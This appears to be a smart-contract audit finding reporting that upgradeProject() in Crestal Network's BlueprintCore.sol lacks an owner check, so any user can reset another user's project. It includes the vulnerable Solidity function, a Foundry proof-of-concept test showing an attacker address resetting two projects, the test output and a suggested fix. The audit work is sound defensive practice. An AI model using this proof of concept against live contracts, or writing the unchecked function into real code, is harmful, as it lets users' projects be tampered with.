Prehistoric Topaz Moose

Medium

# Unlimited role for upgradeProject function will allow attacker to reset on other user's project

### Summary

In BlueprintCore.sol

https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L198


As upgradeProject() function doesn't check owner of the project, any user can reset the other user's project.

### Root Cause

In upgradeProject
```solidity
function upgradeProject(bytes32 projectId) public hasProject(projectId) {
        // reset project info
        projects[projectId].requestProposalID = 0;
        projects[projectId].requestDeploymentID = 0;
        projects[projectId].proposedSolverAddr = dummyAddress;
    }
```

As shown, upgradeProject has no checking for owner of project.
So if any user know the project id, can reset other user's project.

### Internal Pre-conditions

N/A

### External Pre-conditions

N/A

### Attack Path

N/A

### Impact

Any user can reset other user project that is already requested proposal or requested deploy 
This could lead breakdown of protocol.

### PoC

In BlueprintV5.t.sol

- Add following function

```solidity
function test_upgrade_other_user_project() public{

        address user = address(0x01);
        address attacker = address(0x02);



        bytes32 projectId1 = bytes32(uint256(101));

        vm.prank(user);
        bytes32 proposalId = blueprint.createProjectIDAndProposalRequest(projectId1, "test base64 param", "test server url");

        (, bytes32 requestProposalID_correct1, ) = blueprint.getProjectInfo(projectId1);
        console.logBytes32(requestProposalID_correct1);

        vm.prank(attacker);
        blueprint.upgradeProject(projectId1);
        (, bytes32 requestProposalID_incorrect1, ) = blueprint.getProjectInfo(projectId1);
        console.logBytes32(requestProposalID_incorrect1);


        bytes32 projectId2 = bytes32(uint256(102));
        vm.prank(user);
        bytes32 deploymentRequestId =
            blueprint.createProjectIDAndDeploymentRequest(projectId2, "test base64 param", "test server url");
            
        (, , bytes32[] memory requestDeploymentIDs_correct) = blueprint.getProjectInfo(projectId2);
        console.logUint(requestDeploymentIDs_correct.length);

        vm.prank(attacker);
        blueprint.upgradeProject(projectId2);

        (, , bytes32[] memory requestDeploymentIDs_incorrect) = blueprint.getProjectInfo(projectId2);
        console.logUint(requestDeploymentIDs_incorrect.length);
        
    }
```

- Run command : forge test --match-test test_upgrade_other_user_project -vv

- Result

Logs:
  0x310ab2b5b082111ca1aee4bd57a891caaf02c232ec7ad7b93cb2681327eb74c5
  0x0000000000000000000000000000000000000000000000000000000000000000
  1
  0

As result shows, proposalId of project1 is reset and deploymentRequestId of project2 is reset by attacker.

### Mitigation

Need to add role that checks if msg.sender is owner of project or not in upgradeProject() function.